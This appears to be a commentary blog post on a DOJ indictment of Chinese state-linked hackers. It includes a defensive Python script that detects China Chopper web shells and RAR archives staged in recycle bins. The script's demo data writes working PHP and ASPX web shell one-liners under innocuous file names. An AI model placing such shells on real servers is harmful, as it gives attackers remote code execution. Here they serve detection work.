The U.S. decision to demand that China close its Houston consulate dominated the news cycle this week, but an even more important development may have been the indictment of two Chinese hackers who worked at times with China’s Ministry of State Security. The indictment, seen here, is breathtaking for two reasons: the hackers displayed remarkable sophistication, and they stole an enormous volume of secrets. This revelation, combined with many others I chronicled in The New Art of War, such as the APT10 case, suggests the Chinese have mastered the world’s computer systems. They appear to have access to anything they want.
Tech sophistication: we know from the APT10 case that the hackers used malware to evade intrusion detection systems and then capture the keystrokes of legitimate users, which let them log in as those users. The new twist is this: the hackers placed “web shells,” including one called the China Chopper web shell, onto victims’ computers. “It provides an easy-to-use interface through which the user can control web shells installed on multiple victim computers,” the Department of Justice charged. The hackers gave the shells innocuous file names to hide them and could even protect them with passwords. Once they found what they wanted, they compressed the files into encrypted Roshal Archive (RAR) files and saved them in the recycle bins of the compromised computers, where system administrators are much less likely to look. From there the RAR files were exfiltrated.
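The two artifacts described above, a China Chopper-style web shell under the web root and RAR archives staged in a recycle bin, are both things a defender can sweep for. The script below is an added example written for this post; it is not code from the indictment or from the DOJ. It checks file contents rather than names, because the indictment stresses that the shells were given innocuous names and the archives were parked where nobody looks. The web shell patterns are the publicly documented one-line forms of the China Chopper server-side component (PHP, classic ASP and ASPX); the RAR magic numbers are the standard 1.5–4.x and 5.x signatures. The directory layout and the sample files are constructed here for the demo and are assumptions, not evidence from any real case.

```python
"""Sweep a filesystem snapshot for two indicators: China Chopper-style web
shells in a web root, and RAR archives staged inside a Windows recycle bin.

Added example for this post, not code from the indictment.  The sample tree
built by build_sample_tree() is constructed for the demo.
"""
import os
import re
import tempfile

# RAR magic numbers: "Rar!\x1a\x07\x00" for 1.5-4.x, "Rar!\x1a\x07\x01\x00" for RAR5.
RAR_SIGNATURES = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")

# Recycle bin directory names on Vista+ ($Recycle.Bin) and XP/2003 (RECYCLER, RECYCLED).
RECYCLE_DIR_NAMES = {"$recycle.bin", "recycler", "recycled"}

# China Chopper server-side one-liners: "eval whatever the client POSTs".
WEBSHELL_PATTERNS = [
    re.compile(rb"@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[", re.I),          # PHP
    re.compile(rb"eval\s*\(\s*Request\.Item\s*\[.*?\]\s*,\s*[\"']unsafe[\"']", re.I),  # ASPX/JScript
    re.compile(rb"eval\s*\(\s*Request\s*\(", re.I),                          # classic ASP
]


def is_rar(path, sigs=RAR_SIGNATURES):
    """True if the file starts with a RAR signature, whatever its extension."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    return any(head.startswith(sig) for sig in sigs)


def in_recycle_bin(path):
    """True if any directory component of the path is a recycle bin folder."""
    parts = {p.lower() for p in path.split(os.sep)}
    return bool(parts & RECYCLE_DIR_NAMES)


def find_staged_archives(root):
    """RAR files sitting inside a recycle bin anywhere under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if in_recycle_bin(path) and is_rar(path):
                hits.append(path)
    return sorted(hits)


def find_web_shells(webroot, max_bytes=4096):
    """Files under webroot whose first max_bytes match a China Chopper pattern."""
    hits = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read(max_bytes)
            if any(p.search(data) for p in WEBSHELL_PATTERNS):
                hits.append(path)
    return sorted(hits)


def scan(root):
    """Run both sweeps and return the matching basenames, sorted."""
    webroot = os.path.join(root, "inetpub", "wwwroot")
    return {
        "staged_archives": sorted(os.path.basename(p) for p in find_staged_archives(root)),
        "web_shells": sorted(os.path.basename(p) for p in find_web_shells(webroot)),
    }


def build_sample_tree():
    """Constructed demo snapshot: one clean page, two shells, one staged RAR."""
    root = tempfile.mkdtemp(prefix="ioc_demo_")

    def write(rel, data):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

    write("inetpub/wwwroot/index.aspx", b'<%@ Page Language="C#" %><html>hello</html>')
    write("inetpub/wwwroot/img/thumb.aspx",  # innocuous name, ASPX China Chopper
          b'<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>')
    write("inetpub/wwwroot/upload/ok.php", b"<?php echo 'ok';")
    write("inetpub/wwwroot/upload/404.php", b"<?php @eval($_POST['pass']);?>")  # PHP China Chopper
    # RAR5 archive renamed to .tmp and parked in a user's recycle bin.
    write("$Recycle.Bin/S-1-5-21-1/$R3X7.tmp", b"Rar!\x1a\x07\x01\x00" + b"\x00" * 32)
    write("$Recycle.Bin/S-1-5-21-1/$RZ99.txt", b"just a deleted note\n")
    # A RAR outside the recycle bin: not flagged by this particular sweep.
    write("Users/alice/Documents/backup.rar", b"Rar!\x1a\x07\x00" + b"\x00" * 32)
    return root


if __name__ == "__main__":
    print(scan(build_sample_tree()))
    # {'staged_archives': ['$R3X7.tmp'], 'web_shells': ['404.php', 'thumb.aspx']}
```

Two caveats a practitioner should keep in mind: the archive sweep only checks the RAR signature, not the encryption flag in the archive headers, so a follow-up check (or simply trying to list the archive) is needed to confirm the password protection the indictment describes; and China Chopper’s server half can be rewritten in many ways, so the regexes above catch the textbook one-liners, not every obfuscated variant. Both sweeps are meant to run against a mounted disk image or a file share export, not live on a production web server.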
Scale: The victims of the latest hacks were in the United States, Australia, Belgium, Germany, Japan, Lithuania, the Netherlands, South Korea, Spain, Sweden and the United Kingdom.
The hackers were inside these systems from 2009 through 2020. It’s just incredible that they weren’t caught. In addition to stealing information related to Covid-19 treatments, they stole information about radar systems, educational data, Air Force research projects, the works. The thefts extended across dozens of sensitive technology fields.
We are left with this stunning possibility: the Chinese government and its affiliated hackers have reached a level of sophistication at which they can hack virtually any computer in the world, sight unseen, and stay inside for years. We have yet to awaken to the full dimensions of this challenge.